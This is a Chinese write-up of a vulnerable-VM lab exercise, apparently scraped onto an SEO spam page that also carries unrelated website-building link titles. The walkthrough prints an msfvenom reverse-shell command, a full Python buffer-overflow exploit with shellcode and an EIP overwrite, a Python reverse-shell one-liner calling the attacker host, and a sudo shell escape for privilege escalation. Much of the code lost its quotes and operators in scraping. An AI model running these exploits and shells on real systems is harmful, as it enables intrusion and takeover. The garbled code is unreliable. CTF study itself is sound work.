当前位置: 首页 > news >正文

网站设计网站机构东莞关键词优化代理

网站设计网站机构,东莞关键词优化代理,可以做网站的网络,重庆装修公司大全文章目录 一、基础信息 二、信息收集 三、反弹shell 四、提权 一、基础信息 Kali IP#xff1a;192.168.20.146 靶机 IP#xff1a;192.168.20.155 二、信息收集 似乎开放了9999#xff0c;10000端口#xff0c;访问页面没有太多内容#xff0c;扫描一下目录 dirs…文章目录 一、基础信息 二、信息收集 三、反弹shell 四、提权 一、基础信息 Kali IP192.168.20.146 靶机 IP192.168.20.155 二、信息收集 似乎开放了999910000端口访问页面没有太多内容扫描一下目录 dirsearch -u http://192.168.20.155:10000 -x 403 有个bin目录访问一下 将文件下载下来,后续不清楚咋搞了 看wp了解到后续又是涉及到缓冲区溢出漏洞有点复杂了不太懂可自行搜索其他wp 如https://blog.csdn.net/m0_62652276/article/details/135352714 下面直接写解题步骤 三、反弹shell 使用msfvenom创建反弹shell的负载 msfvenom -p windows/shell_reverse_tcp LHOST192.168.20.146 LPORT9090 -b \x00 -f py -o shellcode.txt 我们使用如下命令将buf替换为shellcode sed -i s/buf/shellcode/g shellcode.txt 创建exp.py import socket server (192.168.20.155, 9999) rubbish bA * 524 eip b\xF3\x12\x17\x31 nop b\x90 * 16shellcode b shellcode b\xba\x21\xd1\xd8\x7a\xda\xd7\xd9\x74\x24\xf4\x5f shellcode b\x29\xc9\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\x76 shellcode b\xdf\x3a\x8f\x84\x37\x38\x70\x74\xc8\x5d\xf8\x91 shellcode b\xf9\x5d\x9e\xd2\xaa\x6d\xd4\xb6\x46\x05\xb8\x22 shellcode b\xdc\x6b\x15\x45\x55\xc1\x43\x68\x66\x7a\xb7\xeb shellcode b\xe4\x81\xe4\xcb\xd5\x49\xf9\x0a\x11\xb7\xf0\x5e shellcode b\xca\xb3\xa7\x4e\x7f\x89\x7b\xe5\x33\x1f\xfc\x1a shellcode b\x83\x1e\x2d\x8d\x9f\x78\xed\x2c\x73\xf1\xa4\x36 shellcode b\x90\x3c\x7e\xcd\x62\xca\x81\x07\xbb\x33\x2d\x66 shellcode b\x73\xc6\x2f\xaf\xb4\x39\x5a\xd9\xc6\xc4\x5d\x1e shellcode b\xb4\x12\xeb\x84\x1e\xd0\x4b\x60\x9e\x35\x0d\xe3 shellcode b\xac\xf2\x59\xab\xb0\x05\x8d\xc0\xcd\x8e\x30\x06 shellcode b\x44\xd4\x16\x82\x0c\x8e\x37\x93\xe8\x61\x47\xc3 shellcode b\x52\xdd\xed\x88\x7f\x0a\x9c\xd3\x17\xff\xad\xeb shellcode b\xe7\x97\xa6\x98\xd5\x38\x1d\x36\x56\xb0\xbb\xc1 shellcode b\x99\xeb\x7c\x5d\x64\x14\x7d\x74\xa3\x40\x2d\xee shellcode b\x02\xe9\xa6\xee\xab\x3c\x68\xbe\x03\xef\xc9\x6e shellcode b\xe4\x5f\xa2\x64\xeb\x80\xd2\x87\x21\xa9\x79\x72 shellcode b\xa2\x16\xd5\x68\xa0\xff\x24\x90\xe7\x7d\xa1\x76 shellcode b\x8d\x91\xe4\x21\x3a\x0b\xad\xb9\xdb\xd4\x7b\xc4 shellcode b\xdc\x5f\x88\x39\x92\x97\xe5\x29\x43\x58\xb0\x13 shellcode b\xc2\x67\x6e\x3b\x88\xfa\xf5\xbb\xc7\xe6\xa1\xec shellcode b\x80\xd9\xbb\x78\x3d\x43\x12\x9e\xbc\x15\x5d\x1a shellcode b\x1b\xe6\x60\xa3\xee\x52\x47\xb3\x36\x5a\xc3\xe7 shellcode b\xe6\x0d\x9d\x51\x41\xe4\x6f\x0b\x1b\x5b\x26\xdb shellcode b\xda\x97\xf9\x9d\xe2\xfd\x8f\x41\x52\xa8\xc9\x7e shellcode b\x5b\x3c\xde\x07\x81\xdc\x21\xd2\x01\xec\x6b\x7e shellcode b\x23\x65\x32\xeb\x71\xe8\xc5\xc6\xb6\x15\x46\xe2 shellcode b\x46\xe2\x56\x87\x43\xae\xd0\x74\x3e\xbf\xb4\x7a shellcode b\xed\xc0\x9c buf rubbish eip nop shellcodes socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(server) s.send(buf) s.close() 然后赋予可执行权限进行执行kali开启监听端口即可反弹 当前仍处于win虚拟环境当中需要进行Win虚拟环境逃逸 由上可知当前环境有python环境可利用python再反弹一次shell /usr/bin/python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.20.146,8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(sh) python -c import pty;pty.spawn(/bin/bash) 四、提权 尝试sudo提权发现有可利用的信息 可进行提权sudo尝试后提示输入命令 输入ls后在光标处输入!/bin/bash提权成功
http://www.dnsts.com.cn/news/204720.html

相关文章:

  • 成都自然排名优化义乌网络优化
  • 做自己的网站有什么用建网站的公司首选智投未来
  • php 数据录入网站腾讯云电商网站建设
  • 买业务送网站wordpress 漫画 主题
  • 网站 备案已注销最好的seo外包
  • 怎么搭建网站视频教程常州集团网站建设
  • 建一个网站需要多少钱?仿站网站
  • 营销型网站制作流程企业网络营销分析报告
  • 上海微网站建设方案怎样做公众号
  • 深圳三合一建设网站营销型网站建设特点
  • 济南外贸网站推广公司网络推广培训
  • 做网站需要哪些费用鹤壁建设网站推广渠道
  • 自己免费做网站百度指数排名
  • 企业购物网站建设市场营销方案500字
  • 克州seo整站排名长春网站建设net
  • 个人网站可以做信息网站吗电脑培训机构哪里有
  • 网站设计服务做泵阀生意到哪个网站
  • 网站免费网站免费网站做招聘需要什么资质
  • 一个空间可以做几个网站吗老字号品牌建设
  • 服装网站建设项目规划书温岭哪里有做网站的
  • 网站建设微信公众号文章企业生产管理软件
  • 常见网站建设公司术语集团网页建设
  • 优秀设计师网站怎么引流推广
  • 贺岁币在建设银行那个网站预约网站建设流程周期
  • 学做网站需要懂什么软件自己如何创立网站
  • 个人网站可以做商业吗seo网络培训学校
  • 网站搭建规划杭州燎远精品课程网站建设
  • phpcms校园网站网站数据库5g
  • 网站做专题提升权重外贸石材网站
  • 郑州网站建设msgg功能多的免费网站建设